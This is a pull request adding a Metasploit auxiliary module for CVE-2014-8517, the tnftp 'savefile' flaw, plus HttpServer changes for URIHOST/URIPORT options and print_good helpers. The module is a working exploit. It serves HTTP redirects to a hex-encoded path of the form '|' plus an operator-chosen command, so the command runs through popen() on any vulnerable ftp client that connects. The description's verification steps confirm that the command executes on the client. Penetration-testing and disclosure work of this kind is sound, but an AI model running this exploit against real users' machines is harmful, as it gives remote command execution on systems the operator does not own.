### PR TITLE
Add tnftp_savefile exploit

### DIFF
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -37,6 +37,11 @@ module Exploit::Remote::HttpServer
       ], Exploit::Remote::HttpServer
     )
 
+    register_advanced_options([
+      OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']),
+      OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)'])
+    ])
+
     # Used to keep track of resources added to the service manager by
     # this module. see #add_resource and #cleanup
     @my_resources = []
@@ -76,6 +81,11 @@ module Exploit::Remote::HttpServer
   end
   # :category: print_* overrides
   # Prepends client and module name if inside a thread with a #cli
+  def print_good(msg='')
+    (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
+  end
+  # :category: print_* overrides
+  # Prepends client and module name if inside a thread with a #cli
   def print_error(msg='')
     (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
   end
@@ -99,6 +109,11 @@ module Exploit::Remote::HttpServer
   # :category: print_* overrides
   # Prepends client and module name if inside a thread with a #cli
   def vprint_status(msg='')
+    (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
+  end
+  # :category: print_* overrides
+  # Prepends client and module name if inside a thread with a #cli
+  def vprint_good(msg='')
     (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super
   end
   # :category: print_* overrides
@@ -449,7 +464,9 @@ module Exploit::Remote::HttpServer
   def get_uri(cli=self.cli)
     ssl = !!(datastore["SSL"])
     proto = (ssl ? "https://" : "http://")
-    if (cli and cli.peerhost)
+    if datastore['URIHOST']
+      host = datastore['URIHOST']
+    elsif (cli and cli.peerhost)
       host = Rex::Socket.source_address(cli.peerhost)
     else
       host = srvhost_addr
@@ -459,7 +476,9 @@ module Exploit::Remote::HttpServer
       host = "[#{host}]"
     end
 
-    if (ssl and datastore["SRVPORT"] == 443)
+    if datastore['URIPORT']
+      port = ':' + datastore['URIPORT'].to_s
+    elsif (ssl and datastore["SRVPORT"] == 443)
       port = ''
     elsif (!ssl and datastore["SRVPORT"] == 80)
       port = ''
@@ -494,7 +513,9 @@ module Exploit::Remote::HttpServer
   #
   # @return [String]
   def srvhost_addr
-    if (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
+    if datastore['URIHOST']
+      host = datastore['URIHOST']
+    elsif (datastore['LHOST'] and (!datastore['LHOST'].strip.empty?))
       host = datastore["LHOST"]
     else
       if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")

--- a/modules/auxiliary/server/tnftp_savefile.rb
+++ b/modules/auxiliary/server/tnftp_savefile.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'tnftp "savefile" Arbitrary Command Execution',
+      'Description' => %q{
+        This module exploits a vulnerability.
+      },
+      'Author' => [
+        'Jared McNeill', # Vulnerability discovery
+        'wvu' # Metasploit module
+      ],
+      'References' => [
+        ['CVE', '2014-8517'],
+        ['URL', 'http://seclists.org/oss-sec/2014/q4/459']
+      ],
+      'DisclosureDate' => 'Oct 28 2014',
+      'License' => MSF_LICENSE,
+      'Actions' => [
+        ['Service']
+      ],
+      'PassiveActions' => [
+        'Service'
+      ],
+      'DefaultAction' => 'Service'
+    ))
+
+    register_options([
+      OptString.new('CMD', [true, 'Command to run', 'uname -a'])
+    ])
+  end
+
+  def run
+    exploit
+  end
+
+  def on_request_uri(cli, request)
+    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
+      print_status("#{request['User-Agent']} connected")
+      send_not_found(cli)
+      return
+    end
+
+    if request.uri.ends_with?(sploit)
+      send_response(cli, '')
+      print_good("Executing `#{datastore['CMD']}'!")
+      report_vuln(
+        :host => cli.peerhost,
+        :name => self.name,
+        :refs => self.references,
+        :info => request['User-Agent']
+      )
+    else
+      print_status("#{request['User-Agent']} connected")
+      print_status('Redirecting to exploit...')
+      send_redirect(cli, sploit_uri)
+    end
+  end
+
+  def sploit_uri
+    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
+      Rex::Text.uri_encode(sploit, 'hex-all')
+  end
+
+  def sploit
+    "|#{datastore['CMD']}"
+  end
+
+end

--- a/modules/auxiliary/server/tnftp_savefile.rb
+++ b/modules/auxiliary/server/tnftp_savefile.rb
@@ -14,7 +14,16 @@ class Metasploit4 < Msf::Auxiliary
     super(update_info(info,
       'Name' => 'tnftp "savefile" Arbitrary Command Execution',
       'Description' => %q{
-        This module exploits a vulnerability.
+        This module exploits an arbitrary command execution vulnerability in
+        tnftp's handling of the resolved output filename - called "savefile" in
+        the source - from a requested resource.
+
+        If tnftp is executed without the -o command-line option, it will resolve
+        the output filename from the last component of the requested resource.
+
+        If the output filename begins with a "|" character, tnftp will pass the
+        fetched resource's output to the command directly following the "|"
+        character through the use of the popen() function.
       },
       'Author' => [
         'Jared McNeill', # Vulnerability discovery


### PR DESCRIPTION
Also adds `URI{HOST,PORT}` and `{,v}print_good` to `HttpServer`.

**Verification steps:**
- [ ] Start the server (I like using an innocuous `URIPATH`)
- [ ] Connect to it with `ftp` on OS X or FreeBSD or NetBSD or DragonFly BSD or...?
- [ ] See that `CMD` gets executed on the client
